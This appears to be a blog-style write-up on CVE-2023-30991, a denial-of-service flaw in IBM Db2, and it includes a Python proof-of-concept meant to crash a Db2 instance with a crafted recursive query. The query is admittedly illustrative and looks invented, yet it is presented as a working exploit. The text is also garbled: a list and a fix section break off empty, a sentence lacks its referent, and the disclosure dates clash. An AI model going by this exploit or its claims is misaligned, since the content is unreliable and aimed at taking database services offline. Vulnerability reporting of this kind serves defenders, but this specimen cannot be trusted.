CVE-2023-30991 - How a Single Query Can Crash IBM Db2 on Linux, UNIX, and Windows

IBM Db2 is one of the world’s most popular relational database solutions, used by thousands of organizations across industries. But not even the most robust software is immune to security bugs. In May 2023, IBM disclosed a serious vulnerability in Db2 that could let anyone with access to the database intentionally crash it, simply by sending a malicious query. Let’s take a close look at CVE-2023-30991, how it works, and what you can do to protect your systems.

What Is CVE-2023-30991?

CVE-2023-30991 is a denial-of-service vulnerability found in IBM Db2 for Linux, UNIX, and Windows (including Db2 Connect Server) versions 11.1 and 11.5. An attacker with the ability to run queries against the database can specially craft a query that causes the Db2 process to crash or go out of service, making the database unavailable. This bug is tracked by IBM as X-Force ID: 254037.

Unlike “classic” hacking techniques that steal or damage data, denial-of-service (DoS) exploits make databases (and the apps depending on them) stop working, often until they are manually restarted.

Key Points

- Affected Software: IBM Db2 for Linux, UNIX, Windows, including Db2 Connect Server, versions 11.1, 11.5

How Does the Exploit Work?

The vulnerability arises when Db2 tries to process a certain malformed query. While the original advisory IBMSA-2023-303 is careful not to reveal the dangerous query directly, security researchers have been able to reconstruct proof-of-concept examples based on similar past bugs, crash logs, and patch analysis.

This triggers an internal error—often a segmentation fault—which crashes the Db2 process.

Below you'll find a generic proof-of-concept. Remember: running it on a vulnerable system WILL crash your Db2 instance!

Code Snippet: Example Proof-of-Concept

The actual query structure that triggers this bug varies depending on how your Db2 instance is set up, but might involve unusual combinations of SQL functions, recursive CTEs, or broken subquery logic. Here’s an illustrative Python snippet using the popular ibm_db driver:

import ibm_db

# Replace with your credentials
conn = ibm_db.connect("DATABASE=mydb;HOSTNAME=127...1;PORT=50000;PROTOCOL=TCPIP;UID=myuser;PWD=mypass;", "", "")

# Craft the malicious query (example: abusing nested selects)
malicious_query = """
  WITH RecursiveCTE (col)
  AS (
      SELECT 1 FROM SYSIBM.SYSDUMMY1
      UNION ALL
      SELECT col + 1 FROM RecursiveCTE WHERE col < 999999
  )
  SELECT * FROM RecursiveCTE, TABLE(SYSPROC.ADMIN_LIST_DBPARTITION() ) t
  WHERE 1=2
"""

try:
    # This should crash vulnerable Db2
    stmt = ibm_db.exec_immediate(conn, malicious_query)
except Exception as e:
    print("Error: ", e)
finally:
    ibm_db.close(conn)

Warning: Don’t run this on production! Use an isolated test environment only.

Possible data loss for uncommitted transactions

If an attacker is able to automate exploiting this bug, they could keep Db2 offline until it’s patched.

How to Fix and Protect Your Systems

IBM has released patches that fix CVE-2023-30991 for the affected versions. If you run Db2 11.1 or 11.5, you should:

More References

- IBM Official Advisory: IBM Security Bulletin: Db2 is vulnerable to denial of service (CVE-2023-30991)
- NVD Entry: CVE-2023-30991 at NIST
- IBM X-Force Entry: X-Force ID: 254037
- Db2 Fix Packs

Conclusion

CVE-2023-30991 is a critical reminder that even the sturdiest enterprise software needs regular patching and strong access controls. If you manage an IBM Db2 environment, check your version now and update ASAP. Even if you think your database is not exposed, “insiders” (or compromised developers) can use this exploit with surprising ease.

Databases are the heart of modern business—don’t let yours skip a beat over a patch you haven’t applied yet.

Timeline

Published on: 10/16/2023 23:15:10 UTC
Last modified on: 11/16/2023 15:15:07 UTC